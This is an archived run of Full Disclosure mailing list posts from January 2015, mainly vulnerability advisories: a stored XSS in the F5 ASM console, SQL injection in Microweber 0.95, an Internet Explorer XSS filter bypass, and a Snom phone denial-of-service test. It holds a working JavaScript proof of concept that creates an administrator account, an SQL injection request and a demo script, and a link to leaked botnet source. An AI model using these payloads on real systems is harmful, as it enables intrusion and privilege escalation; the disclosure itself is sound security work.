Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
===

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a Show button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.



Technical Details and POC
=

The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the Show
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the Show button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user
(see below) into the Response Body input, and saves the page.

2. An admin logs on and previews the block page via the Show button.

3. The JS runs in the background, executes the XHR, and adds a new
admin user. The restricted user now has an admin account.

POC (Sloppy, I know):

<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange =
function()
{
  if (xmlhttp.readyState == 4)
  {
    var postrequest = new XMLHttpRequest();
    // Read the anti-CSRF form fields from the fetched create-user page
    xmlForm = xmlhttp.responseXML.getElementById('myform');
    var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
    var timebeforevalue = encodeURIComponent(xmlForm.elements['_timenow_before'].value);
    var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
    var bufvaluebefore = encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
    var parameters =
      "_timenow=" + timenowvalue + "&_timenow_before=" + timebeforevalue + "&_bufvalue=" + bufvalue + "&_bufvalue_before=" + bufvaluebefore + "&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passwd_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
    postrequest.open("POST", "/tmui/Control/form", true);
    postrequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    postrequest.send(parameters);
  }
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();
</script>



Solution
===

Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline
===
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL
was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Lizard Stresser rekt

2015-01-12 Thread Julius Kivimäki
ayy lmao

//Julius Kivimäki, leader of Lizard Squad

2015-01-12 10:29 GMT+00:00 Robert Cavanaugh <sleuth1...@gmail.com>:

> Hi FD,
>
> I'm sure you're all sick to death of hearing about Lizard Squad and the
> skid marks they're leaving all over the place, so we'll make this brief:
> Lizard Squad has been rekt and the source code for their bots is now
> available for your viewing pleasure.
>
> https://github.com/pop-pop-ret/lizkebab
>
> 0wned by: Chippy1337, @packetprophet
>
> If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
> https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4



[FD] SQL Injection Vulnerability in Microweber 0.95

2015-01-12 Thread ITAS Team
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95
# Vendor: https://microweber.com/
# Download link: https://microweber.com/download (https://github.com/microweber/microweber)
# CVE ID: CVE-2014-9464
# Vulnerability: SQL Injection
# Affected version: Version 0.95 before 12/09/2014.
# Fixed version: Version 0.95 updated on 12/11/2014
# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)

 

::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed within the
Microweber CMS as an anonymous user. A successful attack could allow an
anonymous attacker to access information such as usernames and password
hashes, or other private information that is stored in the database. The
following URL and parameter have been confirmed to suffer from SQL
injection.

 

- Attack vector:

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

 

- Vulnerable file: microweber-master/src/Microweber/Category.php

- Vulnerable function: get_children($parent_id = 0, $type = false, $visible_on_frontend = false)

- Vulnerable parameter: $parent_id

- Vulnerable code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    $categories_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;

    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];

    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }

    if (intval($parent_id) == 0) {
        return false;
    }

    $data = array();
    $data['parent_id'] = $parent_id;

    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }

    $cache_group = 'categories/' . $parent_id;
    // Only the intval() copy in $categories_id was sanitised; the raw
    // $parent_id from the request is interpolated into the query here.
    $q = "SELECT id, parent_id FROM $table WHERE parent_id=$parent_id";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);

    if (empty($save)) {
        return false;
    }

    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }

    $to_return = array_unique($to_return);

    return $to_return;
}

 

- Fix code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    // Fix: the cast value replaces $parent_id itself before it is used.
    $categories_id = $parent_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;

    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];

    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }

    if (intval($parent_id) == 0) {
        return false;
    }

    $data = array();
    $data['parent_id'] = $parent_id;

    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }

    $cache_group = 'categories/' . $parent_id;
    $q = "SELECT id, parent_id FROM $table WHERE parent_id=$parent_id";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);

    if (empty($save)) {
        return false;
    }

    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }

    $to_return = array_unique($to_return);

    return $to_return;
}

 

 

::SOLUTION::

Version 0.95 updated on 12/11/2014

::TIMELINE::
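To show the effect of the get_children() defect on an actual database, here is an added Python re-implementation of its query construction (not Microweber's code) run against a constructed in-memory SQLite table: the pre-fix version computes intval() into a separate variable and still interpolates the raw value, while the fixed version casts the value before use and binds it as a query parameter. The sample rows and the int_val() approximation of PHP's intval() are assumptions made for this example.

```python
import re
import sqlite3

# Constructed sample rows (id, parent_id); only the two columns the
# advisory's query touches are modelled. Not Microweber's schema.
SAMPLE_CATEGORIES = [(1, 0), (2, 1), (3, 1), (4, 2), (5, 0)]


def int_val(value):
    """Approximation of PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, parent_id INTEGER)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", SAMPLE_CATEGORIES)
    return conn


def get_children_vulnerable(conn, parent_id):
    """Mirrors the pre-fix get_children(): the intval() result lands in
    $categories_id, but the raw $parent_id is interpolated into the SQL."""
    categories_id = int_val(parent_id)   # sanitised copy, never used for the query
    if categories_id == 0:               # same gate as: if (intval($parent_id) == 0)
        return False
    q = "SELECT id, parent_id FROM categories WHERE parent_id=%s" % parent_id
    return sorted({row[0] for row in conn.execute(q)})


def get_children_fixed(conn, parent_id):
    """Mirrors the fix ($parent_id = intval($parent_id)) and additionally
    binds the value as a parameter instead of interpolating it."""
    parent_id = int_val(parent_id)
    if parent_id == 0:
        return False
    rows = conn.execute("SELECT id, parent_id FROM categories WHERE parent_id=?", (parent_id,))
    return sorted({row[0] for row in rows})


if __name__ == "__main__":
    db = make_db()
    # A category value that starts with a digit passes the intval()==0 check
    # but carries its tail into the unparameterised query unchanged.
    crafted = "1 OR 1=1"
    print("vulnerable:", get_children_vulnerable(db, crafted))  # [1, 2, 3, 4, 5]
    print("fixed:     ", get_children_fixed(db, crafted))       # [2, 3]
```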

 

[FD] MS14-080 CVE-2014-6365 Technical Details Without Nonsense

2015-01-12 Thread Diéyǔ

Origin:
Visit https://technet.microsoft.com/library/security/ms14-080
Go to Acknowledgments part and search for CVE-2014-6365
It says Dieyu - that's me.

Technical Details:
Internet Explorer XSS Filter Bypass Vulnerability is done by...
1. Inject a href link into target page.
(Not script, allowed by filter)
2. User clicks this injected link.
(Clickjacking etc)
3. URL of this injected link puts script into page.
(Filter does not kill it)
(Because it's transaction of the same domain)

Social Activities:
1. Greetings
David Ross dross.
2. Hey, if you love my hacking, please reply nice.
(I do this for free. Love to hear from my readers.)
3. My LinkedIn page: https://www.linkedin.com/in/liuzhiyong
(You can add me there! Recently I took a new name.)
4. My ultimate flaw: http://dieyu.org/
(You know my style. Comment is welcome!)

Regards,



Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread Martin Schuhmacher
Hi

I just did

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

Did I miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin
